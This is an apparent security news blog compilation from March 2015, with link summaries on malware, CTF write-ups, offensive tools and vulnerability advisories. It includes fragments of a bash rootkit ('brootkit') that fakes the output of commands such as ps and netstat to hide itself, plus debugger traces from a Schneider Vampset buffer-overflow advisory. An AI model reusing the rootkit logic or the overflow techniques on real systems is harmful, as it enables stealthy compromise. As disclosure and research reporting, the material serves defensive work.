Tuesday, March 31, 2015

New reconnaissance threat Trojan.Laziok targets the energy sector

A new information stealer, Trojan.Laziok, acts as a reconnaissance tool allowing attackers to gather information and tailor their attack methods for each compromised computer.

more here........http://www.symantec.com/connect/blogs/new-reconnaissance-threat-trojanlaziok-targets-energy-sector

FreeBSD/SH Stack Overflow Vulnerability

I found sh have a stack overflow bug on freebsd(9.0-10.0),  it may be
triggered on all freebsd systems, but i have not tested yet. the poc below
is tested on freebsd10.0 amd64 arch:

$ ls
$ . brootkit.sh
$ command
$ ls
brootkit.sh     sh.core

(gdb) x/16x $rsp+0x1b8
0x7fffdfffeff8: Cannot access memory at address 0x7fffdfffeff8
(gdb) x/16x $rsp+0x1c0
0x7fffdffff000: 0x0000000000000000      0x0000000000000000
0x7fffdffff010: 0x0000000000000000      0x0000000000000000
0x7fffdffff020: 0x0000000000000000      0x0000000000000000
0x7fffdffff030: 0x0000000000000000      0x0000000000000000
0x7fffdffff040: 0x0000000000000000      0x0000000000000000
0x7fffdffff050: 0x0000000000000000      0x0000000000000000
0x7fffdffff060: 0x0000000000000000      0x0000000000000000
0x7fffdffff070: 0x0000000000000000      0x0000000000000000

(gdb) disass malloc malloc+32
Dump of assembler code from 0x800d593f0 to 0x800d59410:
0x0000000800d593f0 <malloc+0>:  push   %rbp
0x0000000800d593f1 <malloc+1>:  mov    %rsp,%rbp
0x0000000800d593f4 <malloc+4>:  push   %r15
0x0000000800d593f6 <malloc+6>:  push   %r14
0x0000000800d593f8 <malloc+8>:  push   %r13
0x0000000800d593fa <malloc+10>: push   %r12
0x0000000800d593fc <malloc+12>: push   %rbx
0x0000000800d593fd <malloc+13>: sub    $0x488,%rsp
0x0000000800d59404 <malloc+20>: mov    %rdi,-0x4a0(%rbp)
0x0000000800d5940b <malloc+27>: mov    0x2c2dbe(%rip),%rax        #
0x80101c1d0 <__nsdefaultsrc+4928>

set $i=0
set $addr=$rbp
while ($i <= 1000)
printf "frame[%d] 0x%lx ==> 0x%lx retaddr: 0x%lx\t diass: ", $i, $addr,
*(long *)$addr, *(long *)($addr+8)
x/i  *(long *)($addr+8)
set $i=$i+1
set $addr=*(long *)$addr

frame[98] 0x7fffe0004c00 ==> 0x7fffe0004d60 retaddr: 0x406465    diass:
0x406465 <execve () plt+14073>:    incq   0x21d694(%rip)        # 0x623b00
frame[99] 0x7fffe0004d60 ==> 0x7fffe0004e10 retaddr: 0x40513b    diass:
0x40513b <execve () plt+9167>:     mov    -0x74(%rbp),%r14d
frame[100] 0x7fffe0004e10 ==> 0x7fffe0004ec0 retaddr: 0x405118   diass:
0x405118 <execve () plt+9132>:     cmpl   $0x0,0x21e9f5(%rip)        #
0x623b14 <environ+84>




        local fake_a

        unset command
        case $1 in
                        fake_a="$(command builtin $1 $2)"
                        br_hide_engine "$fake_a"
                        return ;;
                        echo "sh: builtin: builtin: syntax error, sh is not
                        return ;;
                        command builtin $1 $2

        case $1 in
                        echo "$1 is a shell builtin"
                        return ;;
                        echo "dir is /usr/bin/dir"
                        return ;;
                        echo "ls is aliased to ls --color=tty"
                        return ;;
                        echo "ps is /bin/ps"
                        return ;;
                        echo "netstat is hashed (/usr/bin/netstat)"
                        return ;;
                        echo "$1 is $1"
                        return ;;
                        unset command
                        command type $1 $2
                        return ;;

        case $1 in
                        echo "sh: syntax error, sh is not support."
                        return ;;
                        unset $1 $2
                        return ;;

        case $1 in
                        echo "sh: syntax error, sh is not support."
                        return ;;
                        unset command
                        command $1 $2
                        return ;;

        case $1 in
                        builtin $2 $3
                        return ;;
                        fake_unset $2 $3
                        . $BR_ROOTKIT_PATH/brootkit.sh
                        return ;;
                        type $2 $3
                        return ;;
                        fake_command $2 $3
                        return ;;
                        unset command
                        command $2 $3
                        . $BR_ROOTKIT_PATH/brootkit.sh
                        return ;;

                case $1 in
                                builtin $2 $3
                                return ;;
                                set $2 $3
                                return ;;
                                fake_unset $2 $3
                                . $BR_ROOTKIT_PATH/brootkit.sh
                                return ;;
                                type $2 $3
                                return ;;
                                fake_command $2 $3
                                return ;;
                                unset command
                                command $2 $3
                                . $BR_ROOTKIT_PATH/brootkit.sh
                                return ;;

Authored by wzt wzt 
wzt.wzt@gmail com

CTF challenges on docker hub

insomnihack's recently updated repositories.......https://hub.docker.com/u/insomnihack/

XSS flaws expose weaknesses on Amazon and UK newspaper websites

Cross-site scripting (XSS) flaws are amongst the most commonly encountered security flaws found on websites, opening up opportunities for malicious hackers to hijack customer accounts, change users’ settings and phish login credentials.
Unfortunately, it only requires a single web developer to make a mistake to open up opportunities which online criminals can exploit to launch potentially dangerous attacks.
And, although you would like to think that some of the world’s busiest websites would have trained their staff to avoid making the code blunders which can lead to an XSS attack, time and time again we hear of high profile vulnerabilities being found in familiar places.

more here.......http://blog.lumension.com/9973/xss-flaws-expose-weaknesses-on-amazon-and-uk-newspaper-websites/

DOMPurify 0.6.2 release

DOMPurify the DOM-only, super-fast, uber-tolerant XSS sanitizer for HTML, MathML and SVG 0.6.2 here.......https://github.com/cure53/DOMPurify/releases/tag/0.6.2

and for those not familiar with DOMPurify here is additional info......https://github.com/cure53/DOMPurify

Introducing VirtuaPlant 0.1, Industrial Control System Simulator with Physics UI, Soft-PLC (modbus enabled), networked HMI and some ready-made skiddies attack scripts

Today I’m releasing a project I’ve been working on for the past week which I called VirtuaPlant more here...........http://wroot.org/posts/introducing-virtuaplant-0-1/


This is a quick recap of why I'm sad about SMTP encryption. It explains how TLS certificate verification in SMTP is useless even if you force it.

more here...........https://blog.filippo.io/the-sad-state-of-smtp-encryption/


[Michael] sells a remote control spy tank through his company, and although it’s a toy, there’s an impressive amount of electronics in this R/C tank. It’s controlled from an Android or iDevice over a WiFi connection, something that simply won’t do if you’re trying to sell this to the hacker and maker crowd. The solution to this problem is Wireshark, and with a little bit of work this spy tank can be controlled from just about anything, from a microcontroller via WiFi to a Python app.

more here..........http://hackaday.com/2015/03/30/reverse-engineering-an-rc-spy-tank/

Detection, analysis and display of attacks using Honeypots

Thanks to the use of honeypots   (open a new window)and the analysis of the data they generate we can scope the magnitude of the problem we face, obtaining valuable data regarding:

Attack tendencies.
Exploited vulnerabilities.
Services that are intended on being compromised.
Most active countries in cyberattacks.
Malware samples unidentified by antivirus engines.
Techniques used by attackers.
Malware distributors.
Systems belonging to Botnets.
Command and Control Centers (C&C).

more here...........https://www.incibe.es/blogs/post/Security/SecurityBlog/Article_and_comments/honeystation_EN

Airbnb JavaScript Style Guide

A mostly reasonable approach to JavaScript here.....https://github.com/airbnb/javascript

metasploitHelper Release and Slides at Blackhat Asia Arsenal 2015

Metasploit contains port-based modules as well as URI-based modules (web servers). This tool bridges Nmap XML file with Metasploit and generates a resource script containing matching Metasploit modules. that you can run against the target servers.

more here.........https://github.com/milo2012/metasploitHelper

and slides here......http://www.slideshare.net/keith55/metasploithelper-spiderlabs?qid=9057aace-fef0-40f5-ae8e-51fa5d587dd7&v=default&b=&from_search=1

nmap2nessus Release and Slides From Black Hat Asia Arsenal 2015

How nmap2nessus works:
Takes a nmap XML file as input and extracts the 'open' ports and live IP addresses.
Logins into Nessus server and makes a copy of the 'selected' policy.
Modifies the port_range parameter in the policy settings and upload the new policy
Uses the 'default' Nessus policy.
Starts a new Nessus scan using the new policy.
Queries the Nessus server for the status of the job until the job is completed.
Save the Nessus report and extract the important findings

more here......https://github.com/milo2012/nmap2nessus

and slides here....http://www.slideshare.net/keith55/nmap2nessus-presentation-slides-at-black-hat-asia-arsenal-2015?qid=ec52197a-2e0f-4638-a7aa-d70e22bbc265&v=default&b=&from_search=1

0ctf 2015 quals – forward (web250)

At the start we’ve only got an url to our target webserver:
Bildschirmfoto 2015-03-30 um 18.14.33

When we click on “Login” we get a javascript popup which tells us “You Are Not Authorized!”. Then we click on “FLAG”, because that’s what we want. Unfortunately we don’t get a flag yet, but the source code of admin.php is revealed.

more here......http://blog.squareroots.de/en/2015/03/0ctf-2015-quals-forward-web250/

China's Man-on-the-Side Attack on GitHub

We have looked closer at this attack, and can conclude that China is using their active and passive network infrastructure in order to perform a man-on-the-side attack against GitHub.

more here.....http://www.netresec.com/?page=Blog&month=2015-03&post=China%27s-Man-on-the-Side-Attack-on-GitHub

Monday, March 30, 2015

LFI Freak

A unique automated LFi Exploiter with Bind/Reverse Shells
more here...........https://github.com/OsandaMalith/LFiFreak

0CTF Writeup- RSAQuine

For this challenge we had to find all possible messages that are unconcealed when applying RSA with the given e and n, this means that the ciphertext is equal to the plaintext (these messages are called quines in this chall)

more here..........http://tasteless.eu/2015/03/0ctf-2015-rsaquine/

bamfdetect v1.6.3 Nanocore module release

Identifies and extracts information from bots and other malware. Information is returned in a readable json format. bamfdetect works by reading files into RAM, applying any applicable preprocessors, then applying Yara signatures from modules to determine which module it matches. After a match is located, the module can then extract the configuration from the file.

more here........https://github.com/bwall/bamfdetect

and  Nanocore v1.6.3 module release here....https://github.com/bwall/bamfdetect/releases/tag/v1.6.3

0CTF 2015 - mislead (web 300)

We are welcomed with a login page where we can register a new account and log in with it.
After logging to the application we received a:

Hello pwntester. Try to login as 0ops!

The first thing I looked for was for SQL injection in the register and login forms. The register one turned to be injectable and we can use Duplicate entry technique to dump the DB

more here.......http://www.pwntester.com/blog/2015/03/30/0ctf-2015-mislead-web-300/

Threat Spotlight: Dyre/Dyreza: An Analysis to Discover the DGA

Banking and sensitive financial information is a highly coveted target for attackers because of the high value and obvious financial implications.  In the past year, a large amount of attention has been centered on Point of Sale (PoS) malware due to its major role in the compromise of several retailers.  While PoS malware is a major concern, attackers have also realized that targeting individual end users is an effective method of harvesting other types of financial data.  As a result, banking malware has become a prevalent category of malware that poses a major threat to users and organizations of all sizes.

more here.........http://blogs.cisco.com/security/talos/threat-spotlight-dyre

ZeroBrane Studio

ZeroBrane Studio is a lightweight Lua IDE with code completion, syntax highlighting, live coding, code analyzer, and debugging support for Lua 5.1, Lua 5.2, Lua 5.3, LuaJIT, and other Lua engines.

It is simple and instantly usable for beginners (as tested with middle and high school students with no programming experience), yet feature-rich and extensible for experienced developers. Unlike Eclipse and IntelliJ, it has a small footprint and is completely customizable with Lua. Unlike TextMate and Sublime Text, it includes a remote debugger and a full IDE feature set. Unlike Decoda, it runs on Windows, Mac OSX, and Linux and supports on-device debugging.

more here...........http://studio.zerobrane.com/

Boston Key Party 2015 'Wood Island' writeup

Originally, I wanted to write up the write-up for the airport challenge, but since Niklas has already done that, I’m doing the Wood Island challenge instead. It was worth 150 points on the Boston Key Party 2015.

The goal was to break ElGamal Signatures. In short, the solution is based on exploiting “random” values that occur multiple times.

more here..........https://kitctf.de/writeups/bkp2015/wood-island/

SQL Inception: How to select yourself

In this blog post I will describe a few ways to view the whole SQL statement being executed as part of a SQL injection attack. Currently, unless the vulnerable page returns the SQL statement in an error message, performing an attack involves an amount of guesswork by the attacker. The more complicated the original SQL statement, the more difficult it can become to extract data using faster UNION based techniques.

If the type of injection is blind then this can take time to perform and cause a lot of traffic to be generated, especially when extracting a significant amount of data from the database. This prompted the question - “Wouldn’t this be a lot easier if I could see the SQL being executed?”

more here............http://www.contextis.com/resources/blog/sql-inception-how-select-yourself/

Stack overflow in libtasn1


libtasn1 is a library to parse ASN.1 data structures. Its most
prominent user is GnuTLS.

Fuzzing libtasn1 led to the discovery of a stack write overflow in the
function _asn1_ltostr (file parser_aux.c). It overflows a temporary
buffer variable on certain inputs. This issue has been reported to the
developers on 2015-03-26. A fix was released on 2015-03-29.

The issue can be exposed with Valgrind or Address Sanitizer. The
Address Sanitizer output with detailed info is given below.

Git commit / fix
Release notes libtasn1 4.4
Sample input for stack overflow (to be used with examples/pkix.asn from
libtasn1 source, e.g. src/asn1Decoding examples/pkix.asn

An earlier fuzzing effort led to the discovery of a null pointer
derefenence error in the ASN.1 definition parser. This is unlikely to
have any security impact. Null pointer errors are usually not
exploitable and there are probably no scenarios where ASN.1 definitions
are attacker controlled. This issue has been reported to the libtasn1
developers on 2015-01-25 and was fixed on 2015-02-05. The fix was
delivered with the 4.3 release of libtasn1.

Report on mailing list
Git commit / fix
Sample input for null ptr (can be tested with asn1Decoding
TFPA-2015-002-libtasn1-4.2-null-ptr.asn x x)

I want to thank libtasn1 developer Nikos Mavrogiannopoulos for the
quick fixes. Both issues were found with american fuzzy lop.

==4372==ERROR: AddressSanitizer: stack-buffer-overflow on address
0x7fff85a08084 at pc 0x43c180 bp 0x7fff85a07d10 sp 0x7fff85a07d00 WRITE
of size 1 at 0x7fff85a08084 thread T0 #0 0x43c17f in
_asn1_ltostr /data/libtasn1/libtasn1-4.3/lib/parser_aux.c:574 #1
0x41ee31 in
_asn1_get_objectid_der /data/libtasn1/libtasn1-4.3/lib/decoding.c:397
#2 0x41ee31 in
asn1_der_decoding2 /data/libtasn1/libtasn1-4.3/lib/decoding.c:1225 #3
0x423b0e in
asn1_der_decoding /data/libtasn1/libtasn1-4.3/lib/decoding.c:1602 #4
0x403692 in
simple_decode /data/libtasn1/libtasn1-4.3/src/asn1Decoding.c:251 #5
0x403692 in decode /data/libtasn1/libtasn1-4.3/src/asn1Decoding.c:280
#6 0x403692 in main /data/libtasn1/libtasn1-4.3/src/asn1Decoding.c:205
#7 0x7f94cb39af9f in __libc_start_main (/lib64/libc.so.6+0x1ff9f) #8
0x4046a1 (/data/libtasn1/libtasn1-4.3/src/asn1Decoding+0x4046a1)

Address 0x7fff85a08084 is located in stack of thread T0 at offset 564
in frame #0 0x419bdf in
asn1_der_decoding2 /data/libtasn1/libtasn1-4.3/lib/decoding.c:980

This frame has 10 object(s):
[32, 36) 'len2'
[96, 100) 'tag_len'
[160, 164) 'len2'
[224, 232) 'p'
[288, 296) 'p2'
[352, 360) 'ptail'
[416, 424) 'p'
[480, 489) 'temp'
[544, 564) 'temp' <== Memory access at offset 564 overflows this
variable [608, 736) 'temp'

Hanno Böck

mail/jabber: hanno@hboeck.de

commix- Automated All-in-One OS Command Injection and Exploitation Tool

Commix (short for [comm]and [i]njection e[x]ploiter) has a simple environment and it can be used, from web developers, penetration testers or even security researchers to test web applications with the view to find bugs, errors or vulnerabilities related to command injection attacks. By using this tool, it is very easy to find and exploit a command injection vulnerability in a certain vulnerable parameter or string. Commix is written in Python programming language.

more here...........https://github.com/stasinopoulos/commix

Sign Up at irs.gov Before Crooks Do It For You (Good Advice)

If you’re an American and haven’t yet created an account at irs.gov, you may want to take care of that before tax fraudsters create an account in your name and steal your personal and tax data in the process.

read more......http://krebsonsecurity.com/2015/03/sign-up-at-irs-gov-before-crooks-do-it-for-you/

2 Federal Agents in Silk Road Case Face Fraud Charges (I can honestly say I'm not in the least bit surprised)

Two former federal agents are expected to be arrested on Monday on charges of stealing money while working undercover on an investigation into Silk Road, the once-thriving black market website for drug dealing, a document shows.

more here......http://mobile.nytimes.com/2015/03/31/nyregion/silk-road-case-federal-agents-charges.html?_r=0

and this was just 4 days prior if anyone recalls....http://www.washingtonpost.com/world/national-security/report-dea-agents-had-sex-parties-with-prostitutes-hired-by-drug-cartels/2015/03/26/adb2d53e-d3bd-11e4-8fce-3941fc548f1c_story.html

All I can say is be wary of the U.S. Justice System as its not as just as one may think IMO
IE Aaron Swartz and countless others 

A timeline of mobile botnets

The recent explosion in smartphone usage has not gone
unnoticed by malware authors. Indeed, malware authors
have increasingly focused their attention on mobile devices,
leading to a steep rise in mobile malware over the past couple
of years. This paper focuses particularly on mobile bot
variants that can be controlled remotely by an attacker.
The paper begins with a comparison between mobile
and PC botnets, discussing fundamental, conceptual and
implementational differences between them. Next, some
precursors to fully functional mobile bots are discussed,
along with some proof-of-concept mobile botnets that have
been published for research purposes.

more here................https://www.virusbtn.com/pdf/magazine/2015/vb201503-mobile-botnets.pdf

Exploiting CVE-2011-2461 on google.com

As a follow up of our Troopers 2015 presentation about CVE-2011-2461 we want to release more details about a real world exploitation scenario targeting Google services.
During our large-scale analysis of web sites hosting vulnerable SWF files, we found out that also Google was affected.

more here........http://blog.mindedsecurity.com/2015/03/exploiting-cve-2011-2461-on-googlecom.html

and FAQ page with test cases here.....http://blog.nibblesec.org/2015/03/cve-2011-2461-is-back-faq.html

GitHub Status Page After DDoS - All systems reporting at 100%. Attack traffic continues, so we remain on high alert.

Good work continuously updating users here......https://status.github.com/messages?latest


Argon2 is a new hash function, which summarizes the state of the art in the design of memory-hard functions. It is a streamlined and simple design. It aims at the highest memory filling rate and effective use of multiple computing units, while still providing defense against tradeoff attacks. Argon2 is optimized for the x86 architecture and exploits the cache and memory organization of the recent Intel and AMD processors.

more here..........https://www.cryptolux.org/index.php/Argon2

Snort now available!

Snort Security Onion Update and Additional Info Here.....http://blog.securityonion.net/2015/03/snort-2972-now-available.html


Simple framework to extract "actionable" data from Android malware (C&Cs, phone numbers etc.) here...https://github.com/maldroid/maldrolyzer

Paper: Preventing Use-after-free with Dangling Pointers Nullification

Abstract—Many system components and network applications
are written in languages that are prone to memory corruption
vulnerabilities. There have been countless cases where simple
mistakes by developers resulted in memory corruption vulnerabilities
and consequently security exploits. While there have been
tremendous research efforts to mitigate these vulnerabilities, useafter-free
still remains one of the most critical and popular attack
vectors because existing proposals have not adequately addressed
the challenging program analysis and runtime performance
In this paper we present DANGNULL, a system that detects
temporal memory safety violations—in particular, use-after-free
and double-free—during runtime. DANGNULL relies on the key
observation that the root cause of these violations is that pointers
are not nullified after the target object is freed. Based on this
observation, DANGNULL automatically traces the object’s relationships
via pointers and automatically nullifies all pointers when
the target object is freed. DANGNULL offers several benefits. First,
DANGNULL addresses the root cause of temporal memory safety
violations. It does not rely on the side effects of violations, which
can vary and may be masked by attacks. Thus, DANGNULL is effective
against even the most sophisticated exploitation techniques.
Second, DANGNULL checks object relationship information using
runtime object range analysis on pointers, and thus is able to
keep track of pointer semantics more robustly even in complex
and large scale software. Lastly, DANGNULL does not require
numerous explicit sanity checks on memory accesses because
it can detect a violation with implicit exception handling, and
thus its detection capabilities only incur moderate performance

[CORE-2015-0007] - Schneider Vampset Stack and Heap Buffer Overflow

1. Advisory Information

Title: Schneider Vampset Stack and Heap Buffer Overflow
Advisory ID: CORE-2015-0007
Advisory URL: http://www.coresecurity.com/advisories/schneider-vampset-stack-and-heap-buffer-overflow
Date published: 2015-03-30
Date of last update: 2015-03-27
Vendors contacted: Schneider
Release mode: Coordinated release

2. Vulnerability Information

Class: Heap-based Buffer Overflow [CWE-122], Stack-based Buffer Overflow [CWE-121]
Impact: Code execution
Remotely Exploitable: No
Locally Exploitable: Yes
CVE Name: CVE-2014-8390, CVE-2014-8390

3. Vulnerability Description

User-friendly and free of charge VAMPSET software [1] has been designed for setting parameters and configuring relays and is suitable for the entire VAMP range of protection relays, VAMP 321 arc flash protection unit and measuring and monitoring units. This indispensable setting and configuration tool allows relay parameters, configurations and recorded data to be exchanged between a computer and a VAMP relay using various communication cables.

VAMPSET handles the relay settings as documents, vef-files. Settings of one physical device are considered one document. Documents can be read from the relay and transferred between similar relays. Documents can also be saved to the computer hard drive, and later loaded back to the relay using VAMPSET.

VAMPSET is vulnerable to a Stack-based and Heap-based buffer overflow attack, which can be exploited by attackers to execute arbitrary code, by providing a malicious CFG or DAT file with specific parameters.

4. Vulnerable packages

VAMPSET v2.2.145

Other versions are probably affected too, but they were not checked.

5. Vendor Information, Solutions and Workarounds

Given that this is a client-side vulnerability, affected users should avoid opening untrusted .cfg or .dat files. Core Security also recommends those affected use third party software such as Sentinel [3] or EMET [2] that could help to prevent the exploitation of affected systems to some extent.

The vendor published the following advisory [5] that includes mitigation instrucctions and a reference to the updated software.

6. Credits

This vulnerability was discovered and researched by Ricardo Narvaja from Core Security Exploit Writing Team. The publication of this advisory was coordinated by Joaquín Rodríguez Varela from Core Security Advisories Team.

7. Technical Description / Proof of Concept Code

[CVE-2014-8390] This vulnerability is caused by a controlled heap buffer overflow when opening specially crafted Comtrade [4] format files.

The problem lays in the following facts. First the software allocs a fixed size in here:

.text:00494125 push    1A68h           ; size_t
.text:0049412A call    sub_4CC928
Then it goes to a malloc with 1A68h size:

.text:004CC92E loc_4CC92E:             ; size_t
.text:004CC92E push    edi
.text:004CC92F call    _mallloc
And finally here:

004B3483  |> \83C6 0F       ADD ESI,0F
004B3486  |.  83E6 F0       AND ESI,FFFFFFF0
004B3489  |.  56            PUSH ESI                                 ; /HeapSize = 1A70 (6768.)
004B348A  |.  6A 00         PUSH 0                                   ; |Flags = 0
004B348C  |.  FF35 2C605700 PUSH DWORD PTR DS:[57602C]               ; |hHeap = 003C0000
004B3492  |.  FF15 70224F00 CALL DWORD PTR DS:[<&KERNEL32.HeapAlloc>>; \HeapAlloc
After applying the AND 0f and FFFFFFF0 the size is 0x1a70:

0012EF50   003C0000  |hHeap = 003C0000
0012EF54   00000000  |Flags = 0
0012EF58   00001A70  \HeapSize = 1A70 (6768.)

Then it writes in this section without checking the size of what is written. In the POC it ends up crashing after overflowing the heap section:

00497C03  |.  F3:A5         |REP MOVS DWORD PTR ES:[EDI],DWORD PTR D>
00497C05  |.  8BC8          |MOV ECX,EAX
00497C07  |.  83E1 03       |AND ECX,3
00497C0A  |.  F3:A4         |REP MOVS BYTE PTR ES:[EDI],BYTE PTR DS:>

00D65F60  43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43  CCCCCCCCCCCCCCCC
00D65F70  43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43  CCCCCCCCCCCCCCCC
00D65F80  43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43  CCCCCCCCCCCCCCCC
00D65F90  43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43  CCCCCCCCCCCCCCCC
00D65FA0  43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43  CCCCCCCCCCCCCCCC
00D65FB0  43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43  CCCCCCCCCCCCCCCC
00D65FC0  43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43  CCCCCCCCCCCCCCCC
00D65FD0  43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43  CCCCCCCCCCCCCCCC
00D65FE0  43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43  CCCCCCCCCCCCCCCC
00D65FF0  43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43  CCCCCCCCCCCCCCCC

EAX 00003BC6
ECX 0000082D
EDX 00003BC5
EBX 00D64468
ESP 0012ED30
EDI 00D66000
EIP 00497C03 Vampset.00497C03

Nevertheless, is a controllable heap overflow, therefore if a less amount of characters is used it can provoke code execution.

[CVE-2014-8390] This vulnerability is caused by a controlled stack buffer overflow when opening specially crafted Comtrade [4] format files.

When VAMPSET opens the malformed files the following occurs. It sends a message to LB_GETTEXT with the length of the string:

0013F6FC   0048E070  /CALL to SendMessageW from Vampset.0048E06E
0013F700   00840B22  |hWnd = 840B22
0013F704   00000189  |Message = LB_GETTEXT
0013F708   00000000  |Index = 0
0013F70C   0013F760  \Buffer = 0013F760

The length of that string is bigger than the destination buffer and therefore overwrites the return address that is located after the buffer:

$ ==>    >49 00 4C 00 31 00 4D 00 35 00 4D 00 35 00 4D 00  I.L.1.M.5.M.5.M.
$+10     >35 00 4D 00 35 00 4D 00 35 00 4D 00 35 00 4D 00  5.M.5.M.5.M.5.M.
$+20     >35 00 4D 00 35 00 4D 00 35 00 4D 00 35 00 4D 00  5.M.5.M.5.M.5.M.
$+30     >35 00 4D 00 35 00 4D 00 35 00 4D 00 35 00 4D 00  5.M.5.M.5.M.5.M.
$+40     >35 00 4D 00 35 00 4D 00 35 00 4D 00 35 00 4D 00  5.M.5.M.5.M.5.M.
$+50     >35 00 4D 00 35 00 4D 00 35 00 4D 00 35 00 4D 00  5.M.5.M.5.M.5.M.
$+60     >35 00 4D 00 35 00 4D 00 35 00 4D 00 35 00 4D 00  5.M.5.M.5.M.5.M.
$+70     >35 00 4D 00 35 00 4D 00 35 00 4D 00 35 00 4D 00  5.M.5.M.5.M.5.M.
$+80     >35 00 4D 00 35 00 4D 00 35 00 4D 00 35 00 4D 00  5.M.5.M.5.M.5.M.
$+90     >35 00 4D 00 35 00 4D 00 35 00 4D 00 CC CC CC CC  5.M.5.M.5.M.ÌÌÌÌ
$+A0     >CC CC CC CC CC CC 38 00 35 00 38 00 31 00 61 00  ÌÌÌÌÌÌ8.5.8.1.a.
$+B0     >61 00 61 00 61 00 61 00 61 00 61 00 61 00 61 00  a.a.a.a.a.a.a.a.
$+C0     >61 00 61 00 61 00 61 00 61 00 61 00 61 00 61 00  a.a.a.a.a.a.a.a.
$+D0     >61 00 00 00                                      a...

0048E0BE   > \5F            POP EDI
0048E0BF   .  5E            POP ESI
0048E0C0   .  5D            POP EBP
0048E0C1   .  5B            POP EBX
0048E0C2   .  81C4 C0000000 ADD ESP,0C0
0048E0C8   .  C3            RETN

From there it jumps to execution, in this case is deviated to 0x4d0035:

0013F7E0   004D0035  Vampset.004D0035
0013F7E4   004D0035  Vampset.004D0035
0013F7E8   004D0035  Vampset.004D0035
0013F7EC   004D0035  Vampset.004D0035
0013F7F0   004D0035  Vampset.004D0035
0013F7F4   004D0035  Vampset.004D0035
0013F7F8   004D0035  Vampset.004D0035

004D0035  |.  FFD5          CALL EBP                                 ; \ClientToScreen

After this it executes our code in the stack:

0013F7EC    35 004D0035     XOR EAX,35004D00
0013F7F1    004D 00         ADD BYTE PTR SS:[EBP],CL
0013F7F4    35 004D0035     XOR EAX,35004D00
0013F7F9    004D 00         ADD BYTE PTR SS:[EBP],CL
0013F7FC    CC              INT3
0013F7FD    CC              INT3
0013F7FE    CC              INT3
0013F7FF    CC              INT3
0013F800    CC              INT3
0013F801    CC              INT3
0013F802    CC              INT3
0013F803    CC              INT3
0013F804    CC              INT3
0013F805    CC              INT3
0013F806    3800            CMP BYTE PTR DS:[EAX],AL
0013F808    35 00380031     XOR EAX,31003800
0013F80D    0061 00         ADD BYTE PTR DS:[ECX],AH
0013F810    61              POPAD

8. Report Timeline

2015-01-29: Core Security sent an initial notification to CCC@us.schneider-electric.com informing them of the vulnerability and requesting their PGP key in on order to send them the encrypted advisory draft.
2015-02-05: Core Security sent another email to CIC-Technical@us.schneider-electric.com and LeeAnn.Luck@Schneider-Electric.com informing them of the vulnerability and requesting their PGP key in on order to send them the encrypted advisory draft.
2015-02-16: Schneider replied our email attaching their public PGP key, and asking if we were coordinating with ICS-CERT and the versions of their product we tested.
2015-02-20: Core Security sendt a draft copy of the Advisory. Considering that both vulnerabilities are client side and affect a software and not a device we don't think it would be necessary to contact ICS-CERT. We inform them that we are planning to release this advisory on the 20th of March, 2015.
2015-02-23: Schneider confirms the reception of Core Security draft advisory. They inform they are evaluating the report.
2015-02-27: Schneider informs they are evaluating the heap buffer overflow vulnerability and they request the Proof Of Concept files (Comtrade) we used to trigger the crash and the exploit as well. They request we coordinate a release date depending on their patch plan.
2015-03-02: Core Security sends Schneider both PoC files and explains that is our policy never to release exploit code, just the files/code that triggers the vulnerability and causes the application to crash. We also expressed our willingness to work together.
2015-03-03: Schneider confirms reception of our email and attached files.
2015-03-20: Schneider informed us that they have addressed the vulnerability and they requested that we review their security disclosure.
2015-03-25: Core Security informed Schneider that they should review the "Vulnerability Overview" section of their disclosure in order to clarify that the vulnerability could not only cause a crash in the application. We requested the time and date they are planning to publish the advisory and the update as well as the link to their publication. We informed them the URL were our advisory is going to be published and the CVE ID we are planning to use.
2015-03-25: Schneider informed us that they made the recommended modifications to their disclosure document and they sent us the new version. They also said they will publish it on their website.
2015-03-26: Core Security asked Schneider if they could inform us the exact date they are planning to publish their disclosure document. Additionally we recommended them to delay the release until Monday in order to give the affected users enough time to patch their software before the weekend.
2015-03-26: Schneider informed us that they published the advisory. They claim that because of its location, the document is not easy to find until they publicize it through a news item. They informed us that they will try to post the news item on Monday but they give no guarantees. They inform as well that they have contacted ICS-CERT so they are aware.
2015-03-27: Core Security replied Schneider that by publishing the advisory they missed the hole point of a coordinated release, even if their advisory is not easy to find online. We informed them that we are going to publish our advisory on Monday 30th at 9 am EST in order to give the affected users enough time to patch their software before the weekend.
2015-03-30: Advisory CORE-2015-0007 published.

9. References

[1] http://www.schneider-electric.com/products/ww/en/2300-ied-user-software/2320-vamp-user-software/62050-vamp-software/.
[2] http://support.microsoft.com/kb/2458544.
[3] https://github.com/CoreSecurity/sentinel.
[4] http://en.wikipedia.org/wiki/Comtrade.
[5] http://download.schneider-electric.com/files?p_Reference=SEVD-2015-084-01&p_EnDocType=Brochure&p_File_Id=766875737&p_File_Name=SEVD-2015-084-01+VAMPSET+Software.pdf.

10. About CoreLabs

CoreLabs, the research center of Core Security, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com.

11. About Core Security

Core Security enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations.

Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com.

12. Disclaimer

The contents of this advisory are copyright (c) 2015 Core Security and (c) 2015 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/

13. PGP/GPG Keys

This advisory has been signed with the GPG key of Core Security advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc.